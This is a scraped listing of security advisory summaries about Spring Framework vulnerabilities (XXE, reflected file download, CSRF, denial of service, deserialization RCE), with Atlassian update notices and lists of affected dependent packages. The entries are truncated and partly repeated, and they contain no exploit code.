Privilege Escalation

spring-web is vulnerable to privilege escalation. Creating or recreating the temporary storage directory creates multiple instances collision which allows a locally authenticated malicious user to read or modify files being uploaded or overwrite arbitrary files with multipart request data...

Update Atlassian Platform to 3.5.19 to fix CVE-2018-1000613, CVE-2019-17571 and other vulnerabilities

Update Atlassian Platform from 3.5.17 to 3.5.19. The new platform version brings changes in the following libraries: update com.atlassian.applinks: from 5.4.21 to 5.4.23 update com.atlassian.plugins: from 4.4.10 to 4.4.14 update com.atlassian.sal: from 3.1.2 to 3.1.3 update com.atlassian.streams:...

Update Atlassian Platform to 3.5.19 to fix CVE-2018-1000613, CVE-2019-17571 and other vulnerabilities

Update Atlassian Platform from 3.5.17 to 3.5.19. The new platform version brings changes in the following libraries: update com.atlassian.applinks: from 5.4.21 to 5.4.23 update com.atlassian.plugins: from 4.4.10 to 4.4.14 update com.atlassian.sal: from 3.1.2 to 3.1.3 update com.atlassian.streams:...

spring-ws: XML External Entity Injection (XXE) when receiving XML data from untrusted sources

Spring Web Services, versions 2.4.3, 3.0.4, and older unsupported versions of all three projects, were susceptible to XML External Entity Injection XXE when receiving XML data from untrusted sources...

Reflected File Download (RFD) Attack

spring-web is vulnerable to Reflected File Download RFD attack. An incomplete fix of CVE-2015-5211 allows an attacker to bypass the protection against RFD attack via the jsessionid path parameter...

The vulnerabilities of the spring-webmvc and spring-webflux modules of the Spring Framework allow attackers to perform cross-site request forgery attacks.

The vulnerability of the spring-webmvc and spring-webflux modules of the Spring Framework is related to the lack of protection against Cross-Site Request Forgery CSRF attacks. Exploiting this vulnerability allows a malicious actor to perform CSRF attacks remotely...

springframework: DoS Attack via Range Requests

Spring Framework, version 5.1, versions 5.0.x prior to 5.0.10, versions 4.3.x prior to 4.3.20, and older unsupported versions on the 4.2.x branch provide support for range requests when serving static resources through the ResourceHttpRequestHandler, or starting in 5.0 when an annotated controlle...

Insecure version of Spring Web MVC used in Confluence Analytics

Hello! A transitive dependency issue has been found in Confluence Analytics: https://atlassian.sourceclear.io/workspaces/Paaina7/issues/vulnerabilities/26465610 Confluence Analytics has a transitive dependency on the Spring Web MVC library, which has a security bug. The issue can be fixed by...

CVE-2019-3773

Spring Web Services, versions 2.4.3, 3.0.4, and older unsupported versions of all three projects, were susceptible to XML External Entity Injection XXE when receiving XML data from untrusted sources...

Reflected File Download

spring-web is vulnerable to reflected file download. The filename attribute that is derived from the user-supplied Content-Disposition header is not validated and sanitized, potentially resulting in the downloaded content of the response to be saved and executed as a file by the user's browser...

Remote Code Execution (RCE)

spring-web is vulnerable to remote code execution RCE. When it is used with external endpoints regardless of endpoints being authenticated or not, the function HttpInvokerServiceExporter: readRemoteInvocation allows deserialization of untrusted object if the endpoints are exposed to untrusted...

GHSA-8222-6FC8-MHVF Vulnerability that affects org.springframework.ws:spring-ws and org.springframework.ws:spring-xml

Spring Web Services, versions 2.4.3, 3.0.4, and older unsupported versions of all three projects, were susceptible to XML External Entity Injection XXE when receiving XML data from untrusted sources...

Vulnerability that affects org.springframework.ws:spring-ws and org.springframework.ws:spring-xml

Spring Web Services, versions 2.4.3, 3.0.4, and older unsupported versions of all three projects, were susceptible to XML External Entity Injection XXE when receiving XML data from untrusted sources...

CVE-2019-3773

Spring Web Services, versions 2.4.3, 3.0.4, and older unsupported versions of all three projects, were susceptible to XML External Entity Injection XXE when receiving XML data from untrusted sources...

Xxe

Spring Web Services, versions 2.4.3, 3.0.4, and older unsupported versions of all three projects, were susceptible to XML External Entity Injection XXE when receiving XML data from untrusted sources...

PT-2019-5717 · Spring · Spring Web Services

Name of the Vulnerable Software and Affected Versions: Spring Web Services versions 2.4.3, 3.0.4, and older unsupported versions Description: The issue is related to incorrect restriction of XML links to external objects, which can lead to XML External Entity Injection XXE when receiving XML data...

Denial Of Service (DoS)

spring-web is vulnerable to denial of service DoS. A malicious user can pass a HTTP request containing a header with overlapping ranges, leading to an error which would crash the service...

ColumnPack:ColumnPack-plugin (=1.0.3), CustomHistory:CustomHistory (>=1.1 <=1.3) +4985 more potentially affected by CVE-2015-3192 via org.springframework:spring-web (>=1.2.1 <=3.2.13.RELEASE)

org.springframework:spring-web MAVEN version =1.2.1, =1.1, =0.0.1, =1.0, =0.0.20, =1.0.0-alpha-1, =1.0, =2.0, =1.1.1, =1.0.2, =1.1.2, =1.2, =1.3 and more Source cves: CVE-2015-3192 Source advisory: OSV:GHSA-6V7W-535J-RQ5M...

am.ik.springmvc:new-controller (>=0.1.0 <=0.2.0), am.ik.woothee:woothee-spring (=1.0.0) +1729 more potentially affected by CVE-2015-3192 via org.springframework:spring-web (>=4.0.0.RELEASE <=4.1.6.RELEASE)

org.springframework:spring-web MAVEN version =4.0.0.RELEASE, =0.1.0, =1.0.0, =1.3.1-RELEASE, =0.0.6, =0.9.0-1, =1.0.0 and more Source cves: CVE-2015-3192 Source advisory: OSV:GHSA-6V7W-535J-RQ5M...

ai.foremast.metrics:foremast-spring-4x-k8s-metrics (>=0.1.6 <=0.2.0), at.porscheinformatik.zanata:zanata-spring (>=1.0.0.RELEASE <=1.1.0.RELEASE) +2978 more potentially affected by CVE-2018-11039 via org.springframework:spring-web (>=4.3.0.RELEASE <=4.3.17.RELEASE)

org.springframework:spring-web MAVEN version =4.3.0.RELEASE, =0.1.6, =1.0.0.RELEASE, =1.6, =1.6, =1.0.10, =0.2.13, =0.2.13, =0.2.13, =0.7, =1.7.2, =1.1.3, =1.1.7 - ch.rasc:wampspring =1.1.2 - ch.rasc:wampspring-security =1.1.2 - ch.rasc:wampspring-session =1.1.2 and more Source cves: CVE-2018-110...